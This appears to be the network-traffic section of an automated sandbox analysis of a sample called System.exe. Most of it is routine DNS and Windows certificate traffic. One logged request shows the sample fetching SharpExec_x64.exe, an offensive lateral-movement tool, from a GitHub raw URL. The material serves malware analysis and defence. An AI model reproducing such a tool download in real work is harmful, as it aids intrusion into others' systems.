                                                                                                                                                    HTTP/1.1 200 OK
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Content-Length: 30208
                                                                                                                                                    Cache-Control: max-age=300
                                                                                                                                                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                    ETag: "09822efabd3bbaa686b5421bf7717e3af0ec3c41e47f45c9e6b720437f9c69b7"
                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    Via: 1.1 varnish (Varnish/6.0)
                                                                                                                                                    X-GitHub-Request-Id: CCC0:1BE9:370770:43DDBD:5EEADE79
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Date: Thu, 18 Jun 2020 04:28:29 GMT
                                                                                                                                                    Via: 1.1 varnish
                                                                                                                                                    X-Served-By: cache-ams21059-AMS
                                                                                                                                                    X-Cache: HFM, HIT
                                                                                                                                                    X-Cache-Hits: 0, 1
                                                                                                                                                    X-Timer: S1592454510.542984,VS0,VE1
                                                                                                                                                    Vary: Authorization,Accept-Encoding
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    X-Fastly-Request-ID: 89b0977939abc7bee813b85d5878426a92bce716
                                                                                                                                                    Expires: Thu, 18 Jun 2020 04:33:29 GMT
                                                                                                                                                    Source-Age: 11
                                                                                                                                                  • flag-unknown
                                                                                                                                                    DNS
                                                                                                                                                    www.download.windowsupdate.com
                                                                                                                                                    Remote address:
                                                                                                                                                    8.8.8.8:53
                                                                                                                                                    Request
                                                                                                                                                    www.download.windowsupdate.com
                                                                                                                                                    IN A
                                                                                                                                                    Response
                                                                                                                                                    www.download.windowsupdate.com
                                                                                                                                                    IN CNAME
                                                                                                                                                    wu-fg-shim.trafficmanager.net
                                                                                                                                                    wu-fg-shim.trafficmanager.net
                                                                                                                                                    IN CNAME
                                                                                                                                                    2-01-3cf7-0009.cdx.cedexis.net
                                                                                                                                                    2-01-3cf7-0009.cdx.cedexis.net
                                                                                                                                                    IN CNAME
                                                                                                                                                    fg.download.windowsupdate.com.c.footprint.net
                                                                                                                                                    fg.download.windowsupdate.com.c.footprint.net
                                                                                                                                                    IN A
                                                                                                                                                    8.238.24.126
                                                                                                                                                    fg.download.windowsupdate.com.c.footprint.net
                                                                                                                                                    IN A
                                                                                                                                                    67.27.153.126
                                                                                                                                                    fg.download.windowsupdate.com.c.footprint.net
                                                                                                                                                    IN A
                                                                                                                                                    8.238.20.126
                                                                                                                                                    fg.download.windowsupdate.com.c.footprint.net
                                                                                                                                                    IN A
                                                                                                                                                    8.247.211.126
                                                                                                                                                    fg.download.windowsupdate.com.c.footprint.net
                                                                                                                                                    IN A
                                                                                                                                                    8.238.21.254
                                                                                                                                                  • flag-unknown
                                                                                                                                                    GET
                                                                                                                                                    http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                                                                                                                                                    System.exe
                                                                                                                                                    Remote address:
                                                                                                                                                    8.238.24.126:80
                                                                                                                                                    Request
                                                                                                                                                    GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1
                                                                                                                                                    Cache-Control: max-age = 3600
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Accept: */*
                                                                                                                                                    If-Modified-Since: Tue, 21 Apr 2020 00:50:26 GMT
                                                                                                                                                    If-None-Match: "03582d87617d61:0"
                                                                                                                                                    User-Agent: Microsoft-CryptoAPI/6.1
                                                                                                                                                    Host: www.download.windowsupdate.com
                                                                                                                                                    Response
                                                                                                                                                    HTTP/1.1 200 OK
                                                                                                                                                    Date: Thu, 18 Jun 2020 04:10:49 GMT
                                                                                                                                                    Content-Type: application/vnd.ms-cab-compressed
                                                                                                                                                    Content-Length: 58383
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Cache-Control: public, max-age=3600
                                                                                                                                                    ETag: "0597791bc2cd61:0"
                                                                                                                                                    Expires: Thu, 18 Jun 2020 05:10:49 GMT
                                                                                                                                                    Last-Modified: Mon, 18 May 2020 02:32:26 GMT
                                                                                                                                                    Server: Microsoft-IIS/10.0
                                                                                                                                                    X-Powered-By: ASP.NET
                                                                                                                                                    X-CID: 3
                                                                                                                                                    X-CCC: NL
                                                                                                                                                    MSREGION: EMEA
                                                                                                                                                    Age: 1060
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                  • flag-unknown
                                                                                                                                                    GET
                                                                                                                                                    http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                                                                                                                                                    System.exe
                                                                                                                                                    Remote address:
                                                                                                                                                    8.238.24.126:80
                                                                                                                                                    Request
                                                                                                                                                    GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1
                                                                                                                                                    Cache-Control: max-age = 3600
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Accept: */*
                                                                                                                                                    If-Modified-Since: Mon, 18 May 2020 02:32:26 GMT
                                                                                                                                                    If-None-Match: "0597791bc2cd61:0"
                                                                                                                                                    User-Agent: Microsoft-CryptoAPI/6.1
                                                                                                                                                    Host: www.download.windowsupdate.com
                                                                                                                                                    Response
                                                                                                                                                    HTTP/1.1 304 Not Modified
                                                                                                                                                    Date: Thu, 18 Jun 2020 04:10:49 GMT
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Cache-Control: public, max-age=3600
                                                                                                                                                    ETag: "0597791bc2cd61:0"
                                                                                                                                                    Expires: Thu, 18 Jun 2020 05:10:49 GMT
                                                                                                                                                    Last-Modified: Mon, 18 May 2020 02:32:26 GMT
                                                                                                                                                    Server: Microsoft-IIS/10.0
                                                                                                                                                    X-Powered-By: ASP.NET
                                                                                                                                                    X-CID: 3
                                                                                                                                                    X-CCC: NL
                                                                                                                                                    MSREGION: EMEA
                                                                                                                                                    Age: 1060
                                                                                                                                                  • 172.217.168.196:443
                                                                                                                                                    https://www.google.com/
                                                                                                                                                    tls, http
                                                                                                                                                    System.exe
                                                                                                                                                    1.5kB
                                                                                                                                                    54.1kB
                                                                                                                                                    25
                                                                                                                                                    41

                                                                                                                                                    HTTP Request

                                                                                                                                                    GET https://www.google.com/

                                                                                                                                                    HTTP Response

                                                                                                                                                    200
                                                                                                                                                  • 151.101.0.133:443
                                                                                                                                                    https://raw.githubusercontent.com/anthemtotheego/SharpExec/master/CompiledBinaries/SharpExec_x64.exe
                                                                                                                                                    tls, http
                                                                                                                                                    System.exe
                                                                                                                                                    1.4kB
                                                                                                                                                    36.6kB
                                                                                                                                                    22
                                                                                                                                                    30

                                                                                                                                                    HTTP Request

                                                                                                                                                    GET https://raw.githubusercontent.com/anthemtotheego/SharpExec/master/CompiledBinaries/SharpExec_x64.exe

                                                                                                                                                    HTTP Response

                                                                                                                                                    200
                                                                                                                                                  • 8.238.24.126:80
                                                                                                                                                    http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                                                                                                                                                    http
                                                                                                                                                    System.exe
                                                                                                                                                    1.8kB
                                                                                                                                                    61.3kB
                                                                                                                                                    27
                                                                                                                                                    45

                                                                                                                                                    HTTP Request

                                                                                                                                                    GET http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab

                                                                                                                                                    HTTP Response

                                                                                                                                                    200

                                                                                                                                                    HTTP Request

                                                                                                                                                    GET http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab

                                                                                                                                                    HTTP Response

                                                                                                                                                    304
                                                                                                                                                  • 10.7.0.255:137
                                                                                                                                                    netbios-ns
                                                                                                                                                    1.2kB
                                                                                                                                                    14
                                                                                                                                                  • 224.0.0.252:5355
                                                                                                                                                    100 B
                                                                                                                                                    2
                                                                                                                                                  • 8.8.8.8:53
                                                                                                                                                    www.google.com
                                                                                                                                                    dns
                                                                                                                                                    60 B
                                                                                                                                                    76 B
                                                                                                                                                    1
                                                                                                                                                    1

                                                                                                                                                    DNS Request

                                                                                                                                                    www.google.com

                                                                                                                                                    DNS Response

                                                                                                                                                    172.217.168.196

                                                                                                                                                  • 8.8.8.8:53
                                                                                                                                                    raw.githubusercontent.com
                                                                                                                                                    dns
                                                                                                                                                    71 B
                                                                                                                                                    170 B
                                                                                                                                                    1
                                                                                                                                                    1

                                                                                                                                                    DNS Request

                                                                                                                                                    raw.githubusercontent.com

                                                                                                                                                    DNS Response

                                                                                                                                                    151.101.0.133
                                                                                                                                                    151.101.64.133
                                                                                                                                                    151.101.128.133
                                                                                                                                                    151.101.192.133

                                                                                                                                                  • 8.8.8.8:53
                                                                                                                                                    www.download.windowsupdate.com
                                                                                                                                                    dns
                                                                                                                                                    76 B
                                                                                                                                                    296 B
                                                                                                                                                    1
                                                                                                                                                    1

                                                                                                                                                    DNS Request

                                                                                                                                                    www.download.windowsupdate.com

                                                                                                                                                    DNS Response

                                                                                                                                                    8.238.24.126
                                                                                                                                                    67.27.153.126
                                                                                                                                                    8.238.20.126
                                                                                                                                                    8.247.211.126
                                                                                                                                                    8.238.21.254

                                                                                                                                                  • 10.7.0.255:3
                                                                                                                                                    System.exe
                                                                                                                                                    130 B
                                                                                                                                                    1
                                                                                                                                                  • 10.7.0.255:3
                                                                                                                                                    System.exe
                                                                                                                                                    130 B
                                                                                                                                                    1
                                                                                                                                                  • 10.7.0.255:3
                                                                                                                                                    System.exe
                                                                                                                                                    130 B
                                                                                                                                                    1
                                                                                                                                                  • 10.7.0.255:3
                                                                                                                                                    System.exe
                                                                                                                                                    130 B
                                                                                                                                                    1
                                                                                                                                                  • 239.255.255.250:1900
                                                                                                                                                    966 B
                                                                                                                                                    6
                                                                                                                                                  • 239.255.255.250:1900

                                                                                                                                                  MITRE ATT&CK Enterprise v6

                                                                                                                                                  Replay Monitor

                                                                                                                                                  Loading Replay Monitor...

                                                                                                                                                  Downloads

                                                                                                                                                  We care about your privacy.

                                                                                                                                                  This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.